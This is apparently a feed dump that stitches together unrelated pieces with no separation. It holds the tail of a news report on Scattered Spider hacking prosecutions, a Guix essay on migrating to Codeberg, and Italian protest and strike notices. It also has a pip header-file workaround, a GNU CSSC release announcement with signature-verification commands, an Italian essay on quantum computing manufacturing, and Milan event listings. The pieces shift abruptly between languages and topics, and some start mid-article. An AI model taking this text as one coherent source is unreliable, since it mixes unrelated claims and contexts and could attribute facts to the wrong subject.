New Jersey prosecutors also allege Jubair also was involved in a mass SMS phishing campaign during the summer of 2022 that stole single sign-on credentials from employees at hundreds of companies. That weeks-long SMS phishing campaign led to intrusions and data thefts at more than 130 organizations, including LastPass, DoorDash, Mailchimp, Plex and Signal.
KrebsOnSecurity reported last year that one of Jubair’s alter egos at age 15 was “Everlynn,” a hacker who sold fraudulent “emergency data requests” that used compromised police and government email addresses to demand subscriber data (e.g. username, IP/email address) from major tech companies, claiming the requests concerned urgent matters of life and death and could not wait for a court order.
In April 2026, 24-year-old British national and Scattered Spider member Tyler “Tylerb” Buchanan pleaded guilty to wire fraud conspiracy and aggravated identity theft for participating in the group’s SMS phishing spree in the summer of 2022. The government said Buchanan, Jubair and others used the credentials harvested in that phishing campaign to steal at least $8 million in cryptocurrency from victims throughout the United States. Buchanan is currently scheduled to be sentenced on October 2.
In August 2025, 20-year-old Scattered Spider member from Florida named Noah Michael Urban was sentenced to 10 years in federal prison and ordered to pay $13 million in restitution, after pleading guilty to charges of wire fraud and conspiracy.
The U.S. Department of Justice says three alleged Scattered Spider defendants indicted along with Buchanan still face charges, including Ahmed Hossam Eldin Elbadawy, 24, a.k.a. “AD,” of College Station, Texas; Evans Onyeaka Osiebo, 21, of Dallas, Texas; and Joel Martin Evans, 26, a.k.a. “joeleoli,” of Jacksonville, North Carolina.
Flowers and Jubair are slated to be sentenced in a London court on July 15, 2026.

L'articolo Dalla banca allo smartphone: come cambia l’accesso al credito digitale proviene da FullPress.







A year ago, Guix migrated to Codeberg for source code hosting, issue tracking, and pull requests. This is a significant change for a project with more than 400 people contributing code each year, after more than decade hosting code at Savannah and dealing with bug reports and patches by email, tracked by a Debbugs instance. This article discusses the process that led to this change and lists some takeaways, a year later.
For years before, the question of our choice of source code hosting and collaboration tools would regularly come up. However, with a community effectively built around the existing tools and workflows, a change to a pull-request workflow was far from obvious—even if many would admit that yes, pull requests are more familiar to many younger hackers than patches and bug reports by email.
Active contributors were efficient with the email workflow—often thanks to Emacs and/or to top-notch email clients—while at the same time being critical of “modern” Web-based forges: after all, Debbugs weighs in at a few hundred lines of Perl, building upon the battle-tested standards and built-in federation of email, whereas a forge like Forgejo is much bigger with hundreds of Go dependencies.
A further complication is that, over time, contributors had built tools around this workflow: mumi would provide a nice web interface to Debbugs and the Quality Assurance service would automatically apply patch series in a Git branch and build packages from that branch—to give the most visible examples. Migrating was all but obvious.
Despite these achievements, dissatisfaction was palpable though, even more so when Steve George (a.k.a. Futurile) published the results of the first user and contributor survey in January 2025, with feedback from no less than 900 people. For contributors who took part in the survey, the email workflow was often mentioned as a hindrance.
As if things were not difficult enough, there was no “benevolent dictator” that the project could rely on to make a sharp decision. Instead, in December 2024, the project adopted a process for collective decision-making: the Guix Consensus Document (GCD) process. The process is ambitious: instead of merely asking “project members” (a concept that needs to be properly defined!) to vote on proposals, authors of proposals are expected to work with everyone to build consensus on the proposal; participants cannot merely “oppose” a proposal but should instead express their needs and suggest concrete changes to address them. At the end of the process, participants can “support”, “accept”, or “disapprove” the final revision of the proposal.
It is too early to tell whether the GCD process will stand the test of time—as of this writing seven proposals were submitted through this process, with varying outcomes—but it surely proved to be a good way to work collectively on the forge migration issue, which was the first real-world use of the GCD process.
GCD 002 was submitted in February 2025 as a proposal to migrate to Codeberg for source code hosting and collaboration. The discussion lasted for two months—the maximum duration permitted by the process—with contributions by many people. Two thirds of the Guix team members participated in the deliberation, among which 72% expressed “support” while the remaining 28% merely “accepted” the proposal; nobody “disapproved” it so the proposal came into force in early May 2025.
The discussion showed that many long-time contributors were not comfortable with the idea of moving to a workflow largely perceived as Web-first and inefficient compared to the email workflow. The idea of abandoning part of the infrastructure carefully built around the email workflow over the years was also unappealing. Yet, the prospect of reaching out to a broader community and improving the developer experience for many was probably a driving force that led to this positive outcome.
One thing in the proposal that didn’t trigger much debate though is the preference both for a free-software-based forge and for one hosted by a non-profit, Codeberg e.V. This choice is very much in line with the Guix ethos.
As agreed-upon in the GCD, the switch to Codeberg was incremental: the main repository was migrated on May 25th, 2025, with the former repository still available as a mirror today; the former issue and patch tracker was kept active until January 1st, 2026, when Codeberg issues and pull requests became the only supported mechanisms (but older bug reports and patches remain accessible on-line).
Thanks to the planning devised during the consensus-building discussion, there were few hiccups and surprises when we switched. The quality of service achieved by the Codeberg e.V. employees and volunteers has been very good and the occasional downtime was usually short and clearly communicated.
For some of us, the main difficulty was to adapt to the new workflow.
For those who prefer a workflow out of the browser, the good news is
that Emacs interfaces—fj.el
and more recently
Emacs-Forgejo—have
been getting better everyday thanks to their amazing developers; the
ability to create pull requests using the AGit
workflow
has also helped bring peace and harmony.
The one issue that wasn’t sufficiently anticipated is continuous integration for pull requests. The part of qa.guix.gnu.org that would previously build packages for patches sent by email was not ported to Codeberg. For several months, it was up to reviewers to make sure that pull requests would not break anything—a situation that was not sustainable.

In September 2025, an instance of
Cuirass was set up at
pulls.ci.guix.gnu.org to
finally build pull requests. This was initially seen as a
stopgap because of
several limitations compared to what qa.guix.gnu.org would previously
do—such as the fact that packages now get built for a single
architecture. However, one advantage for newcomers is that feedback is
immediately visible: Cuirass sends reports indicating success or failure
directly in pull requests as
guix-cuirass-bot.
One of the intuitions and hope we had when we decided to migrate to Codeberg is that the pull-request workflow and its Web interface would allow us to reach out to a broader set of contributors. How did it go?
A first insight is that the commit rate—measured as the number of commits pushed on the main branch—is a noisy metric that doesn’t reveal much. What we see by looking at the period from May 2024 to May 2026 (so one year before and one year after the migration) essentially shows that the commit rate remained essentially between “high” and “very high”:
(As an aside, where are the tools to plot statistics like this from a Git repository? I found myself hacking something together.)
Looking at contributions is more insightful. The plot below shows the number of monthly commit authors, the number of monthly committers, and the number of new commit authors each month (people who authored a commit for the first time in the Git history) for that same period.
The number of monthly authors, including new authors, keeps growing. There was a peak both in the number of authors and number of newcomers in June 2025, right after the migration to Codeberg, but for the rest growth appears to be comparable in the 2025–2026 half and in the 2024–2025 half. Guix keeps attracting new contributors but there wasn’t a significant “Codeberg effect”.
The slight increase in number of monthly committers compared to the sharper increase in number of authors might suggest that committers are more “productive”, handling more contributions.
Since the user survey highlighted some contributors were frustrated by the delay or the lack of response on contributed patches—a problem that many free software projects struggle with—a question is how well Guix deals with that today. The graph below shows the creation and closing rate of pull requests per month over the past year, together with the monthly backlog (pull requests opened the month before or earlier and still opened). This data was acquired using the amazing Forgejo interface.
This again shows an impressive rate of incoming code—more than 500 pull requests opened each month!—and an equally impressive, but slightly lower, merge rate, leading to a constantly-increasing backlog. A similar backlog was observed on Debbugs before. Today, there are about 639 opened pull requests out of 6,459 ever opened, or 10%; for comparison, Nixpkgs has 12k opened pull requests out of 473k ever opened, or 2.5%. This concerning backlog in Guix can perhaps be attributed to excessive friction and/or insufficient continuous integration feedback.
One source of friction is the requirement for each commit to be signed by an authorized committer. Unlike many other projects, including Nixpkgs, this requirement means that a person needs to take responsibility and to apply and sign changes they merge, as opposed to just clicking the “Merge” button. In a way, we’re trading developer convenience for user security. It’s a tradeoff we’re willing to make because we care about securing the “software supply chain”, but we have yet to see if this cost can be mitigated in some way.
On the bright side, and although this is harder to measure, one positive impact of the move to Codeberg is that activity within the project is more legible. I already mentioned continuous integration that provides feedback directly in pull requests, such that contributors immediately discover it, but there’s more.
Guix teams
are reified as Codeberg teams and their scope is given the CODEOWNERS
file such
that the right people are pinged. A bot also adds a corresponding
label—e.g., the team-python label for what’s in the scope of the
Python team—allowing for issue and pull request filtering by label.
However, teams are not notified of issues tagged with the corresponding
label, which is
irritating.
Other features such as cross-references among issues/pull requests as well as milestones also appear to facilitate collaboration.
This is nice and all but there’s still room for improvement.
Our infrastructure could use some help. Build power for pulls.ci.guix.gnu.org should be increased, ideally with also more diversity—building for non-x86 architectures would be great! Cuirass itself has a number of shortcomings; some are being addressed for the upcoming 1.4.x series but there’s more work to be done. And also, pulls.ci.guix.gnu.org remains very much package-oriented; it would be nice, when appropriate, to run system tests as well.
The packager workflow still leaves a bit to be desired, in particular with regards to topic branches and world rebuild scheduling, which is still mostly tied to… our otherwise retired bug tracker.
We also want to remain good citizens, not causing excessive load on Codeberg servers (oops!) and keeping an eye on storage use: a single “fork” of Guix could exceed Codeberg’s new per-user quota of 750 MiB. The solution would be to require new contributors to use the AGit workflow to create pull requests. AGit is already popular among Guix contributors; however, the idea of requiring it is seen as a “downgrade” by some because it lacks the familiarity of the “regular” pull request workflow. One way to mitigate that might be to make it more discoverable with an “AGit fork” icon as was done for Gentoo.
Part of being a good citizen, for Guix and for Codeberg e.V., is listening to and accounting for one another’s concern, and this has worked beautifully so far. Guix Foundation recently voted to become a supporting (non-voting) member of Codeberg e.V. as a way to express gratitude and support.
Oh, breaking news: a pull request adding Forgejo and a service to set it up on Guix has just been submitted! Purely declarative configuration, fully reproducible deployment of a forge—can you imagine⁈ Symbiosis at play.
Many thanks to Steve “Futurile” George, Noé Lopez, and Maxim Cournoyer for reviewing an earlier draft of this post.
Il 23 giugno si svolgerà un'altra asta di vendita dell'area verde di Via Goito, un importantissimo polmone verde di 6 ettari, vitale per la nostra città.
Dopo tre infami tentativi di vendere gli orti all’asta, ci troviamo ancora ad assistere al misero tentativo di speculazione edilizia ai danni di uno degli ultimi polmoni verdi di via Goito, diventato nel corso degli anni simbolo di resistenza attiva contro ogni forma di cementificazione.
L'amministrazione comunale avrebbe avuto la possibilità di cambiarne la destinazione d'uso, togliendo di fatto l'edificabilità, oppure acquistare il terreno. Ma preferisce non farlo, condannandolo all'ennesima speculazione edilizia che la nostra città sarà costretta a subire.
Scendiamo in piazza uniti per esprimere il nostro dissenso: non un centimetro di cemento verrà colato.
No alla distruzione del Parco di via Goito!



Did your pip install fail with longintrepr.h: No such file or directory? The file likely is on your system, but it sometime or another it was moved, from /usr/include/python3.xx/longintrepr.h to /usr/include/python3.xx/cpython/longintrepr.h. The proper fix is to update the package in question with the new path, but if you’re installing an old version of something or a package that’s no longer maintained you can work around it like this:
ln -s /usr/include/python3.*/cpython/longintrepr.h .venv/include
USB proclama per mercoledì 24 giugno uno sciopero di 24 ore di tutti i lavoratori e le lavoratrici del polo siderurgico di Piombino, in concomitanza con l'incontro convocato presso la Regione Toscana.
A distanza di mesi dagli annunci e dagli impegni assunti, il quadro industriale continua a essere caratterizzato da incertezze, ritardi e mancanza di garanzie.
La firma dell'Accordo di Programma da parte di JSW non è ancora arrivata. Sul fronte Metinvest registriamo continui slittamenti rispetto al cronoprogramma presentato. Nel frattempo la guerra in Ucraina, elemento che incide direttamente sulle prospettive del progetto, è tutt'altro che conclusa e continua ad alimentare dubbi sulla reale sostenibilità degli investimenti annunciati.
Ancora più grave è l'assenza di qualsiasi concreta clausola di salvaguardia occupazionale capace di garantire il futuro dei lavoratori coinvolti nei processi di riconversione e rilancio del sito.
USB denuncia inoltre le crescenti difficoltà di convivenza industriale tra i due soggetti privati chiamati a operare nell'area siderurgica. Una situazione che rischia di trasformare Piombino nell'ennesimo laboratorio di promesse mancate, mentre il tempo passa e il prezzo continua a essere pagato esclusivamente dai lavoratori, dalle loro famiglie e dall'intero territorio.
Eppure il polo siderurgico di Piombino viene indicato dal Governo e dal Ministero delle Imprese e del Made in Italy come un sito strategico per l'interesse nazionale. Se davvero è così, non è più accettabile assistere all'ennesima sequenza di rinvii, incertezze e continui impieghi di risorse pubbliche senza risultati concreti sul piano industriale e occupazionale.
Per USB, dopo questi mesi di attese e promesse disattese, è necessario cambiare radicalmente approccio.
Il Governo deve esercitare i poteri della Gold Power e assumere un ruolo diretto nel futuro del polo siderurgico di Piombino, fino alla nazionalizzazione dell'asset strategico, garantendo investimenti, occupazione, tutela salariale e una reale prospettiva industriale per il territorio.
Non possiamo più permettere che il futuro di migliaia di lavoratori e di un settore strategico per il Paese resti ostaggio di interessi privati, ritardi e operazioni che finora hanno prodotto soltanto incertezza.
L'unico prezzo pagato fino ad oggi è stato quello imposto ai lavoratori e alle lavoratrici, costretti a vivere anni di ammortizzatori sociali, precarietà e mancanza di prospettive, mentre il territorio continua a subire gli effetti di una crisi che sembra non avere fine.
Mercoledì 24 giugno fermiamo il polo siderurgico di Piombino.
Per il lavoro, per l'industria, per il territorio.
USB PIOMBINO
USB INDUSTRIA NAZIONALE – CATEGORIA OPERAIA

La giornata del 18 giugno a Livorno si è aperta con una conferenza stampa e un presidio al Varco Valessini, promossi da USB e partecipati dalle realtà livornesi con cui da mesi condividiamo il percorso di mobilitazione a sostegno del popolo palestinese, insieme a realtà del territorio pisano, tra cui il Movimento No Base e il Coordinamento per il Boicottaggio di Israele.
Gli interventi che si sono susseguiti hanno espresso sostegno al passaggio nel nostro territorio delle imbarcazioni della Global Intifada e la Ghassan Kanafani di Freedom Flotilla Italia, impegnate in un viaggio lungo le coste italiane con l'obiettivo di contribuire alla rottura dell'assedio imposto a Gaza, denunciare la complicità dei governi europei con il governo israeliano e contrastare il traffico di armi dirette verso la Palestina.
Le finalità di questa iniziativa sono pienamente coerenti con il percorso di lotta che le realtà presenti portano avanti nei rispettivi territori. Da tempo denunciamo e contrastiamo, con tutti gli strumenti a nostra disposizione, il transito di armamenti nei porti e l'utilizzo delle infrastrutture portuali per attività e finalità militari.
In questo quadro si inserisce anche la richiesta avanzata da Drass di ottenere una concessione su una banchina dell'area portuale di Livorno, sottraendo spazi all'uso civile del porto per destinarli ad attività legate al settore militare, nello specifico ai test di sommergibili destinati all'Indonesia.
A ciò si aggiungono il traffico di armamenti e il ruolo di hub logistico militare svolto dal porto di Livorno nel collegamento, via mare e via terra, con la base statunitense di Camp Darby.
Il passaggio delle imbarcazioni ha rappresentato simbolicamente questi temi e queste lotte: l'attraversamento del porto nelle vicinanze delle aree interessate dalle richieste di Drass e il successivo percorso lungo il Canale dei Navicelli, che costeggia Camp Darby e lungo il quale transitano carichi militari diretti verso diversi luoghi di oppressione e conflitto, compresa la Palestina.
Oggi abbiamo scelto di muoverci lungo le rotte delle armi per ribadire il nostro dissenso verso il riarmo, la militarizzazione dei territori e la guerra, e per riaffermare il nostro sostegno al popolo palestinese. Una mobilitazione che continuerà e che sarà ancora più forte, qualora proseguano i processi di militarizzazione del porto e del territorio.



L'articolo SEO on-page: checklist aggiornata per ottimizzare ogni pagina del sito proviene da FullPress.
Una serata di danza, arte e trasformazione
Tre quadri, nove performance e decine di artiste in scena per raccontare la forza della rinascita femminile. Domenica 21 giugno il Teatro del Borgo di Milano ospita “Donne in Rinascita”, la rassegna di Metiss’Art dedicata al valore delle donne attraverso la danza e la ricerca artistica.
Milano 17 Giugno 2026 – La rassegna di danze etniche e danze di ricerca ideata e realizzata dalle insegnanti e dalle allieve di Metiss’Art propone una riflessione artistica sul percorso di crescita, consapevolezza e trasformazione delle donne attraverso il linguaggio universale della danza.
–

–
In un momento storico in cui il tema dell’empowerment femminile è sempre più centrale nel dibattito culturale e sociale, la rassegna offre uno spazio di espressione e condivisione dove il corpo diventa strumento di racconto, memoria e rinascita.
Lo spettacolo si sviluppa in tre quadri narrativi che accompagnano il pubblico in un percorso di crescita e trasformazione. Alle 19.00 prende il via “Conoscere e accogliere”, dedicato alla scoperta di sé e all’accettazione della propria identità. Alle 20.00 è la volta di “Trovare il cammino”, incentrato sulla ricerca della propria direzione e della forza interiore. La serata si conclude alle 21.00 con “Raccogliere i frutti”, celebrazione della maturazione personale e della consapevolezza raggiunta.
Sul palco si alterneranno danze persiane contemporanee, danza orientale, fusion, teatrodanza, FCBD Style, Danza Duende e altre forme espressive che, pur provenendo da tradizioni diverse, condividono la capacità di raccontare l’universo femminile nelle sue molteplici sfaccettature: fragilità e coraggio, radici e cambiamento, ascolto e determinazione.
Particolarmente significativa è la performance “Donne in Rinascita”, che dà il titolo all’intera rassegna e che si ispira a simboli e archetipi femminili legati alla trasformazione e alla rinascita. Un omaggio alla capacità delle donne di rigenerarsi, reinventarsi e costruire nuovi percorsi personali e collettivi.
L’iniziativa vuole inoltre valorizzare il contributo delle donne alla vita culturale della città, promuovendo il dialogo tra generazioni, culture e linguaggi artistici differenti. Attraverso la danza, Metiss’Art propone una visione del femminile come energia creativa, inclusiva e generatrice di cambiamento.
https://www.metissart.org/news/36615/amp-quot-donne-in-rinascita
Teatro del Borgo – Via Giovanni Verga 5, Milano
Biglietti:
Intera rassegna: 20 euro
Singolo quadro: 10 euro
Prenotazioni: info@metissart.org
DONNE IN RINASCITA
Domenica 21 giugno 2026
Dalle ore 19.00 alle ore 23.00
L'articolo Milano celebra il femminile con “Donne in Rinascita” proviene da InfoMilano.news.

This is to announce CSSC-1.5.0-rc3, a beta release.
This is a release candidate for a future stable 1.5.0 release.
There have been 46 commits by 2 people in the 109 weeks since CSSC-1.5.0-rc2.
See the NEWS below for a brief summary.
Thanks to everyone who has contributed!
The following people contributed changes to this release:
Greg A. Woods (1)
Paul Bryce (2)
James Youngman (43)
James
==================================================================
Here is the GNU CSSC home page:
https://gn ... rg/s/CSSC/
Here are the compressed sources and a GPG detached signature:
https://alpha.gnu ... -1.5.0-rc3.tar.gz
https://alpha.gnu ... .0-rc3.tar.gz.sig
Use a mirror for higher download bandwidth:
https://www.gnu.o ... rg/order/ftp.html
Here are the SHA256 and SHA3-256 checksums:
File: CSSC-1.5.0-rc3.tar.gz
SHA256 sum: a78bc23062b11c33a858acd8a08c173ea2957f763f5b7ddb2990c0fee7c71cec
SHA3-256 sum: 20733dd3c517c1bb44c67088b1a208ebf00e1eab4ab21e806bd963869faf918a
Verify the SHA256 checksum with either sha256sum, sha256, or
'shasum -a 256'.
Verify the SHA3-256 checksum with 'cksum -a sha3 -l 256 --base64'
from coreutils-9.8.
Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:
gpg --verify CSSC-1.5.0-rc3.tar.gz.sig
The signature should match the fingerprint of the following key:
pub rsa4096 2015-12-24 [SC]
0CF4 E8D8 7159 3224 8428 32B8 88DD 9E08 C5DD ACB9
uid James Youngman <james@youngman.org>
uid James Youngman <jay@gnu.org>
If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.
gpg --locate-external-key james@youngman.org
gpg --recv-keys 88DD9E08C5DDACB9
wget -q -O- 'https://savannah. ... SC&download=1' | gpg --import -
As a last resort to find the key, you can try the official GNU
keyring:
wget -q https://ftp.gnu.o ... u/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify CSSC-1.5.0-rc3.tar.gz.sig
This release is based on the CSSC git repository, available as
git clone https://https.git ... .org/git/CSSC.git
with commit 26add75e45f79cd493409ee2f0c2646849314aad tagged as v1.5.0-rc3.
For a summary of changes and contributors, see:
https://gitweb.gi ... tlog;h=v1.5.0-rc3
or run this command from a git-cloned CSSC directory:
git shortlog 43b5b054701732df7ce24eb59821010c39c60cb6..v1.5.0-rc3
This release was bootstrapped with the following tools:
Autoconf 2.72
Automake 1.17
Gnulib 2026-06-08 88592a2880cf39a2f597cd0294a90d8dd7faa2df
NEWS
* Some typos in error message have been fixed.
* admin now supports combination of -r with -n as well as the
portable combination of -r with -i.
* Support "sccs sact"; the sact program already existed but
could not previously be invoked via the sccs wrapper.
Thanks to Greg A. Woods for this improvement.
* In some places we now prefer "grep -E" to "egrep" in order
to avoid a warning message from GNU grep. Some very old
versions of Unix may not support this option.
* Various C++ portability improvements.
version at which it still supported building with Automake.
Immagine in evidenza rielaborata con IA
La computazione quantistica è una delle tecnologie più discusse degli ultimi anni e l’idea di costruire sistemi di calcolo basati sui fenomeni della fisica quantistica continua ad alimentare aspettative enormi. Eppure il quantum computing resta lontano dall’essere una tecnologia matura. Non soltanto perché molti problemi scientifici devono ancora essere risolti, ma anche perché, al momento, manca una filiera industriale in grado di produrre in modo scalabile, e a costi sostenibili, l’hardware necessario a far funzionare un computer quantistico.
Come si può immaginare, costruire un hardware simile è molto complesso. Servono materie prime rare, chimica avanzata, sistemi criogenici sofisticati, ottica di precisione e componenti prodotti da un numero ristretto di aziende specializzate.
Il problema fondamentale è che un computer quantistico non deve semplicemente “calcolare”. Deve riuscire a “mantenere in vita” stati fisici estremamente fragili e utilizzarli per il calcolo. La grande promessa del quantum computing – sfruttare fenomeni quantistici come la sovrapposizione e l’entanglement per eseguire operazioni impraticabili per i computer tradizionali – dipende infatti dalla capacità di isolare gli effetti quantistici dalle interferenze del mondo esterno. Il problema, come anticipato anche da Heisenberg, è che gli stati quantistici sono incredibilmente instabili. Basta pochissimo per distruggerli: una vibrazione microscopica, una minima interferenza elettromagnetica, una variazione termica impercettibile. Questo significa che la prima e principale sfida da affrontare per produrre un computer quantistico è quella di costruire una specie di guscio che isoli il processo di calcolo dal “rumore” dell’ambiente esterno.
Una delle interferenze più difficili da controllare è il calore. Per questo molti computer quantistici – in particolare quelli basati su circuiti superconduttori, una delle architetture oggi più sviluppate da aziende come IBM e Google — operano a temperature vicinissime allo zero assoluto, inferiori persino a quelle dello spazio profondo. Per raggiungerle servono sofisticati sistemi criogenici chiamati dilution refrigerator (refrigeratore a diluizione): strutture metalliche, simili a candelabri barocchi, che sono diventate una delle immagini simbolo del quantum computing.
Uno degli elementi chiave per il funzionamento di questi refrigeratori è invece l’elio-3. Rarissimo sulla Terra, l’elio-3 è un isotopo in proporzione più abbondante sulla superficie lunare, dove si è accumulato per miliardi di anni a causa del bombardamento del vento solare. I depositi di elio-3 diffusi nella regolite lunare alimentano da decenni miti tecnologici su future miniere sulla Luna che oggi, nell’era del “capitalismo spaziale”, paiono meno fantascientifici di un tempo. E del resto si può facilmente immaginare come un eventuale aumento della domanda di questo isotopo, connessa alla crescita del quantum computing, potrebbe rendere ancora più allettante l’avvio di attività estrattive lunari. Nell’attesa, gran parte dell’elio-3 disponibile sul nostro pianeta deriva indirettamente dal decadimento del trizio prodotto nei vecchi programmi nucleari militari, creando così un cortocircuito tra una tecnologia di frontiera e i residui industriali della guerra fredda.
Questa dipendenza da materie prime estremamente specializzate rende la filiera dei refrigeratori a diluzione molto fragile. A produrre queste macchine, infatti, sono pochissime aziende al mondo. La finlandese Bluefors, per esempio, è diventata in pochi anni uno dei principali fornitori dell’industria quantistica globale, ma anche uno degli snodi più delicati dell’intera catena produttiva. Se oggi si osserva la struttura industriale del quantum computing, ci si accorge infatti che il settore assomiglia meno all’industria informatica classica e più a un ecosistema di nicchie iperspecializzate, dove pochi attori controllano componenti essenziali e difficilmente sostituibili.
Un ulteriore problema del quantum computing è che, almeno per ora, non esiste un’unica architettura dominante. Coesistono approcci diversi, ciascuno dei quali richiede infrastrutture, materiali e competenze specifici. Se i computer quantistici basati su circuiti superconduttori richiedono criogenia avanzata, i computer quantistici basati sugli “ioni intrappolati” dipendono invece da laser ad altissima stabilità, vuoto ultra-spinto e componenti fotonici delicatissimi. Altri approcci ancora – come quelli basati sui qubit fotonici o sugli atomi neutri (atomi privi di carica elettrica controllati tramite laser) – richiedono invece fibre e circuiti ottici a bassissima perdita, sorgenti luminose avanzate, specchi e cavità ottiche ad altissima qualità e, in alcuni casi, dispositivi microfabbricati costruiti con tolleranze estremamente ridotte.
Questo significa che, al momento, non esiste una singola frontiera industriale del quantum, ma molte frontiere sovrapposte. Per certi versi, la situazione ricorda alcune fasi iniziali dell’elettronica e dell’informatica del dopoguerra, quando convivevano tubi a vuoto, relè, transistor, memorie magnetiche e soluzioni architetturali diverse. Al tempo, l’industria elettronica era quindi un ecosistema frammentato, popolato da soluzioni incompatibili e processi produttivi difficili da standardizzare. La crescita esplosiva del settore arrivò solo quando emersero componenti, architetture e processi produttivi condivisi, capaci di trasformare dispositivi sperimentali in prodotti scalabili. È una lezione storica importante anche per il quantum computing.
Oggi il settore si trova ancora in una fase pre-standardizzazione: nessuno sa davvero quale architettura diventerà dominante, quali materiali saranno indispensabili o quali componenti potranno essere prodotti industrialmente su larga scala. E finché questa convergenza non avverrà, la computazione quantistica rischia di rimanere in un limbo “proto-industriale”, in cui ogni laboratorio tende a costruire il proprio ecosistema tecnologico come una specie di artigianato scientifico avanzatissimo.
La conseguenza di questo fatto è che molti processi produttivi necessari dipendono dall’esperienza accumulata da piccoli gruppi di tecnici altamente specializzati e sono, al momento, difficili da riprodurre serialmente.
La costruzione di un refrigeratore a diluzione, per esempio, richiede tecnici capaci di assemblare manualmente sistemi criogenici estremamente delicati, minimizzando vibrazioni, dispersioni termiche e impurità microscopiche. Si tratta di processi che dipendono ancora da forme di conoscenza pratica accumulate negli anni più che da standard industriali codificati. Dinamiche simili esistono anche nel campo dei semiconduttori avanzati e della litografia estrema. ASML, l’azienda olandese che produce le macchine EUV utilizzate per realizzare i chip più sofisticati al mondo, dipende a sua volta da una rete ristrettissima di fornitori iper-specializzati che, a loro volta, si avvalgono dell’esperienza di pochissimi “super-esperti” in singoli problemi tecnici altamente specifici.
Il vero collo di bottiglia “industriale” della computazione quantistica non riguarda solo le macchine, i materiali o la fisica, ma anche – e forse soprattutto – la disponibilità di talento tecnico adeguato alla portata della sfida produttiva che il quantum computing rappresenta. Per costruire un computer quantistico non basta infatti disporre di buoni fisici teorici o di eccellenti ingegneri. Serve la capacità di integrare competenze molto rare e diverse tra loro: criogenia estrema, scienza dei materiali, ottica avanzata, microfabbricazione, elettronica a radiofrequenza, software di controllo, vuoto ultra-spinto, chimica ultrapura. E soprattutto serve farlo in modo coordinato, continuo e riproducibile. La vera difficoltà non è solo inventare una tecnologia funzionante, ma costruire una massa critica di persone capaci di trasformarla in un sistema industriale.
Per questo il futuro “industriale” del quantum computing è anche un gigantesco problema di scala umana. Non basta avere qualche centinaio di ricercatori eccellenti sparsi nel mondo accademico. Affinché la tecnologia diventi industriale servono migliaia di tecnici, ingegneri e operatori altamente qualificati distribuiti lungo filiere produttive estremamente sofisticate (un fatto che la Cina sembra aver compreso prima di tutti). Servirà cioè trasformare competenze oggi quasi artigianali in capacità industriali diffuse.
La scienza alla base di tecnologie importanti può certamente nascere da un piccolo gruppo di persone eccezionalmente dotate, ma un’industria richiede la capacità di riprodurre sistematicamente quel livello di competenza su larga scala. Ancora una volta ci si può rivolgere alla storia della microelettronica per capirlo. Il vero salto nella produzione seriale di hardware informatici non avvenne infatti quando un gruppo di pionieri ai Bell Labs inventò i transistor, ma quando gli Stati Uniti cominciarono a formare enormi quantità di ingegneri in grado di capire come funzionavano e come si potevano migliorare transistor e circuiti integrati.
In questo senso la vera sfida per il futuro della computazione quantistica non è soltanto costruire una macchina capace di funzionare. È costruire le condizioni industriali, economiche e umane per trasformare una tecnologia sperimentale fragile in un’infrastruttura produttiva stabile.
L'articolo La sfida industriale dei computer quantistici proviene da Guerre di Rete.
Sebbene il numero di casi d’uso nel nostro Paese sia ancora molto basso, le previsioni di tutti gli esperti dicono che gli agenti AI diventeranno i veri “operatori” dell’automazione dei processi in azienda. Il problema è che chi dovrà gestirne la sicurezza non ha ancora l’esperienza necessaria per farsi un quadro chiaro di come questi […]
L'articolo Zscaler porta la Zero Trust nell’era degli agenti AI proviene da Securityinfo.it.



Iniziativa culturale "Articolo 11 – L'Italia ripudia la guerra", in programma il prossimo 18 giugno alle ore 19:30 presso il Teatro Officina Refugio, nel quartiere Venezia di Livorno.
L'evento prevede la proiezione del documentario realizzato da Simona Tarzia e Fabio Palli, che affronta il tema dei conflitti contemporanei attraverso l'analisi dei flussi commerciali globali, della logistica portuale e delle dinamiche economiche che accompagnano e sostengono gli scenari di guerra.
La serata sarà arricchita da un momento di confronto con la partecipazione di:
Fabio Palli e Simona Tarzia, autori del documentario;
José Nivoi, CALP Genova e Coordinamento Nazionale Porti USB;
Alessio Biondi, Coordinamento Nazionale Porti USB;
Mario Spallino, fondatore Teatro Emergency.
Giovedì 18 giugno 2026 – ore 19:30
Teatro Officina Refugio
Scali del Refugio, Quartiere Venezia – Livorno
Proiezione del documentario "Articolo 11 – L'talia ripudia la guerra"
A seguire dibattito con gli autori.
Ingresso libero.
In allegato la locandina con tutte le info.



Musica, cinema, spettacoli, incontri, laboratori e iniziative all’aperto.
Con la bella stagione ritorna uno degli eventi culturali
più interessanti della zona nord-est di Milano: il NAMA Summer Festival 2026,
in programma dal 12 giugno al 12 luglio al Parco della Martesana.
Dopo l’ottimo riscontro ottenuto dalla prima edizione, la manifestazione si amplia e diventa una rassegna diffusa capace di animare diverse aree del parco con un programma pensato per favorire cultura, condivisione e partecipazione.
L’iniziativa è organizzata da NAMA – Nuovo Anfiteatro Martesana con il patrocinio del Municipio 2 e il supporto del Crowdfunding Civico del Comune di Milano.
LOCATION
Il centro del festival è il Nuovo Anfiteatro Martesana, situato all’interno del Parco Martesana, tra via Valtorta e largo Martiri della Libertà Iracheni Vittime del Terrorismo.
Negli ultimi anni quest’area verde è diventata uno dei principali
punti di riferimento per la vita culturale della città.
Trenta giorni di eventi a ingresso libero
La manifestazione propone 31 giorni consecutivi di appuntamenti,
ideati per coinvolgere persone di tutte le età e valorizzare uno dei parchi più frequentati di Milano.

Il calendario prevede:
concerti e musica dal vivo;
dj set e serate dedicate alla scena elettronica;
proiezioni di cinema all’aperto;
incontri e approfondimenti culturali;
workshop e attività creative;
esposizioni e mostre;
iniziative sportive e dedicate al benessere;
laboratori per bambini e famiglie;
spettacoli teatrali e performance artistiche.

L’obiettivo è offrire occasioni di incontro e rendere la cultura sempre più accessibile,
favorendo la partecipazione della comunità locale.
APPUNTAMENTI ATTESI
Tra gli eventi già confermati figurano diverse serate dedicate alla musica elettronica e alla cultura clubbing milanese.
Ad aprire il festival è stato l’evento Botellon,
che ha dato il via alla stagione estiva del NAMA con musica e intrattenimento all’aria aperta.
Tra i momenti più attesi c’è anche il Toy Tonics Summer Jam, in programma il 20 giugno:
una giornata interamente dedicata alla house e all’italo disco con la partecipazione di dj internazionali, food truck, attività outdoor e accesso gratuito all’area open air del festival.
